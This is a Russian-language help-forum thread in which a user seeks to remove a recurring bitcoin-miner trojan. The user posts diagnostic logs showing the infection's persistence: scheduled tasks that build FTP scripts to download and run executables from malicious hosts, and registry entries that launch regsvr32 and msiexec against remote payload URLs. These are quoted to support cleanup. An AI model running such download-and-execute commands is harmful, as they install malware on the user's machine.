Перейти к содержанию

Троян майнер 0621.exe и lsmo.exe


Рекомендуемые сообщения

Сначала появился троян майнер 0621.ехе в папке debug в каталоге виндовс(ось 7х64). Успешно выпилил его без особых проблем.

Спустя пару дней появился новый троян lsmo.exe (уже в папке help), тоже майнит биткойны. Процесс хакер показывает, что запускается он процессом wininit. После удаления возвращается в рандомное время и снова начинает майнить. Последний месяц новых программ не устанавливалось. При этом левых процессов не запущено, компьютер не перезагружается, автозагрузка пустая, левых служб нет, в реестре тоже ничего нет в автозагрузке. В планировщике заданий нет ничего. Все темповые файлы почистил.

Не могу найти, что его скачивает по новой и запускает. Систему переставлять не очень хочется, слишком много нужного софта стоит.

Ссылка на комментарий
Поделиться на другие сайты

Куреитом прогонял, ничего не находит.

Логи прикрепил


Думаю вот что вызывает проблемы

log:

 

O22 - Task (Ready): Mysa - C:\Windows\system32\cmd.exe /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
O22 - Task (Ready): Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task (Ready): Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task (Ready): ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

 

 

 

Вот еще гадость в реестре нашел, выпилил.

reg':

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\start]
regsvr32 /u /s /i:http://js.mykings.top:280/v.sctscrobj.dll []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\start1]
msiexec.exe /i http://js.mykings.top:280/helloworld.msi/q []

 

В C:\Windows\System32\Tasks удалил файлы Mysa, Mysa1, ok

CollectionLog-2017.07.09-20.48.zip

Изменено пользователем netmaster
Ссылка на комментарий
Поделиться на другие сайты

1)

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lineage 2\ネ胙魵鐱 濵粽・url

заархивируйте и прикрепите к сообщению.

 

2)  - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.
 

3) - Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите.
 

4) "Пофиксите" в HijackThis:

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R0-32 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R0-32 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes: DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} - Bing - http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: URL = http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} - e - http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C} - Google - http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
O2-32 - BHO: IETabPage Class - {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} - C:\Program Files (x86)\XTab\SupTab.dll (file missing)
O2-32 - BHO: PROMT - {1F13CE11-4FAC-49A9-8155-D4F3F0F91A33} - N:\G\PRMT9\PRMTIE\prmtie.dll (file missing)
O3-32 - Toolbar: Переводчик PROMT - {C7DDDD27-F303-42A5-B979-51559F7DC0F0} - N:\G\PRMT9\PRMTIE\prmtie.dll (file missing)
O4 - MSConfig\startupreg: [GarenaPlus] C:\Garena Plus\GarenaMessenger.exe -autolaunch (file missing) (HKCU) (2014/05/01)
O4 - MSConfig\startupreg: [NeteaseGacc] N:\Netease\ty\game\uu\uu.exe  (file missing) (HKLM) (2016/12/04)
O4 - MSConfig\startupreg: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/05/09)
O4 - MSConfig\startupreg: [start] C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll (HKLM) (2017/05/09)
O8 - Extra context menu item: Автоматически определить профиль перевода - N:\G\PRMT9\PRMTIE\aot.htm (file missing)
O8 - Extra context menu item: Настроить параметры перевода - N:\G\PRMT9\PRMTIE\options.htm (file missing)
O8 - Extra context menu item: Перевести всю страницу - N:\G\PRMT9\PRMTIE\page.htm (file missing)
O8 - Extra context menu item: Перевести выделенный текст - N:\G\PRMT9\PRMTIE\translat.htm (file missing)
O8 - Extra context menu item: Перевести поисковый запрос - N:\G\PRMT9\PRMTIE\search.htm (file missing)
O22 - Task (Ready): GameNet - C:/Program Files (x86)/QGNA/qGNA.exe /minimized (file missing)

 

5) Сделайте полный образ автозапуска uVS, только программу скачайте отсюда.
 

Ссылка на комментарий
Поделиться на другие сайты

Это что-то невероятное. Ничто не может справится с этим вирусом. Спустя 2-3 часа он снова вылезает и начинает майнить. Проблем он не доставляет, так как просто закрывается процесс, но всё же...Выход только переходить на 10-ку?

Ссылка на комментарий
Поделиться на другие сайты

@Михаил Андропов, здравствуйте! Не пишите в чужой теме. Создайте свою и выполните Порядок оформления запроса о помощи
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • scaramuccia
      Автор scaramuccia
      Всем привет!
      Касперский обнаружил объект HEUR:Trojan.Win32.Generic в установочном exe-файле. Скорее всего это ложное срабатывание, но все же.
      Он показывает полный путь к объекту: папка, архив, установочный файл и т. д. Как Касперский его так разбирает, если этот файл не распаковывается архиватором, пишет: "Ошибка. Есть данные после конца блока полезных данных"?
      Какие есть способы и ресурсы для этого?
      DIE показывает, что большую часть файла занимает оверлей, который хранит какую-то DLL.

    • Slicked4
      Автор Slicked4
      в последнее время я заметил то что компьютер начал тормозить и проверило его доктор веб курейтом и там нашелся майнер tool.btc.mine2800 по инструкции проверил автологером вот логи
      CollectionLog-2025.05.13-21.57.zip
      после каждой перезагрузки хосты восстонавливаются и компьютер начинает грузится опять
       
    • sajithebloody
      Автор sajithebloody
      Доброго времени, касперский не может справиться с троянами в этих файлах, лечение с перезагрузкой не помогает. Не нашел детект трояна в отчетах Касперского (но это было в моменте), но нашел упоминание попадания этих файлов в исключение сразу же после установки антивиря - подозрительно. Заранее прикрепляю максимум логов, из аутологгера и uvs. 
      лог к.txt CollectionLog-2025.05.09-02.44.zip DESKTOP-LB93OSN_2025-05-09_03-17-36_v4.99.14v x64.7z
    • qwerty1234
      Автор qwerty1234
      Здравствуйте! После посещения сайтов с бесплатными играми и фильмами ноутбук стал резко вибрировать и шуметь. Любой фильм или игра сопровождаются ритмичной вибрацией, которой раньше не было. Подозреваю, что поймал майнер.
      По рекомендации из одной из недавних тем скачал Security Check by glax24. Просканировал. Прикладываю результат.
      Так как сам я в этом не Копенгаген, прошу помочь расшифровать написанное и посоветовать план действий. Заранее благодарен!!!
       
      SecurityCheck by glax24 & Severnyj v.1.4.0.58 [15.08.24]
      WebSite: www.safezone.cc
      DateLog: 09.05.2025 18:25:29
      Path starting: C:\Users\Емельян\AppData\Local\Temp\SecurityCheck\SecurityCheck.exe
      Log directory: C:\SecurityCheck\
      IsAdmin: True
      User: Emelian
      VersionXML: 13.80is-05.05.2025
      ___________________________________________________________________________
      Windows 11 Professional (x64) Версия: 24H2 (10.0.26100.3915) Язык: Russian(0419)
      Дата установки ОС: 25.11.2024 07:02:43
      Статус лицензии: Windows(R), Professional edition Постоянная активация прошла успешно.
      Режим загрузки: Normal
      Браузер по умолчанию: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Системный диск: 😄 ФС: [NTFS] Емкость: [475.9 Гб] Занято: [339.8 Гб] Свободно: [136.1 Гб]
      ------------------------------- [ Windows ] -------------------------------
      Контроль учётных записей пользователя включен (Уровень 3)
      Центр обеспечения безопасности (wscsvc) - Служба работает
      Удаленный реестр (RemoteRegistry) - Служба остановлена
      Обнаружение SSDP (SSDPSRV) - Служба работает
      Службы удаленных рабочих столов (TermService) - Служба остановлена
      Служба удаленного управления Windows (WS-Management) (WinRM) - Служба остановлена
      Фоновая интеллектуальная служба передачи (BITS) (BITS) - Служба остановлена
      Оптимизация доставки (DoSvc) - Служба работает
      Служба "Безопасность Windows" (SecurityHealthService) - Служба работает
      Служба оркестратора обновлений (UsoSvc) - Служба работает
      WaaSMedicSvc (WaaSMedicSvc) - Служба остановлена
      Центр обновления Windows (wuauserv) - Служба остановлена
      ---------------------------- [ Antivirus_WMI ] ----------------------------
      Windows Defender (выключен и обновлен)
      Kaspersky Anti-Virus (включен и обновлен)
      --------------------------- [ FirewallWindows ] ---------------------------
      Брандмауэр Защитника Windows (mpssvc) - Служба работает
      ---------------------- [ AntiVirusFirewallInstall ] -----------------------
      Kaspersky Anti-Virus v.21.3.10.391
      -------------------------- [ SecurityUtilities ] --------------------------
      Kaspersky Password Manager v.25.0.0.225
      --------------------------- [ OtherUtilities ] ----------------------------
      Среда выполнения Microsoft Edge WebView2 Runtime v.136.0.3240.50
      Steam v.2.10.91.91
      Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.42.34438 v.14.42.34438.0
      Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.42.34438 v.14.42.34438.0
      ------------------------------- [ Backup ] --------------------------------
      Microsoft OneDrive v.25.065.0406.0002
      ---------------------------- [ ProxyAndVPNs ] -----------------------------
      PlanetVPN-2.10.30.68 v.2.10.30.68
      ------------------------------- [ Browser ] -------------------------------
      Microsoft Edge v.136.0.3240.50
      ------------------ [ AntivirusFirewallProcessServices ] -------------------
      C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\avp.exe v.21.3.0.1
      Kaspersky Anti-Virus Service 21.3 (AVP21.3) - Служба работает
      C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\avpui.exe v.21.3.12.434
      Microsoft Defender Core Service (MDCoreSvc) - Служба остановлена
      Microsoft Defender Antivirus Service (WinDefend) - Служба остановлена
      Microsoft Defender Antivirus Network Inspection Service (WdNisSvc) - Служба остановлена
      ----------------------------- [ End of Log ] ------------------------------
    • Polina52
      Автор Polina52
      Начал греться ноутбук, грузится цп. На многие сайты не смогла зайти и некоторые программы поставить. Благодарю за ответ.
      Логи прилагаю
      Addition.txt FRST.txt
×
×
  • Создать...